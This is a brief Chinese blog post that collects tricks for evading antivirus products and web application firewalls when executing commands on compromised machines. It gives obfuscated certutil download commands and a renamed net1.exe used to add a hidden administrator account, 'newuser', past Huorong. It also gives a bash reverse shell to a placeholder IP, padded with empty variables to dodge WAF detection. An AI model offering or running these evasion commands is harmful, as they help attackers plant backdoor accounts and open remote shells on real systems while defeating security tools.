命令执行绕过
前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了
1、多空一格
2、^混淆
certutil -url^cache
3、拷贝文件名
copy C:\Windows\System32\certutil.exe xx.exe
之前绕过火绒添加用户案例
copy c:\windows\system32\net1.exe d:\update.exe
d:\update.exe user newuser password123 /add
net localgroup administrators newuser /add
4、修改文件资源绕过360
5、""混淆
ce""""rtu""til -url""""ca""che -spl""""it -f
6、未初始化变量绕过
在Linux中,可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u,它不会报错,而是会返回一个空值。
/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u
标签:初始化,exe,变量,命令,xx,绕过,执行 From: https://www.cnblogs.com/xiaoxin07/p/18401610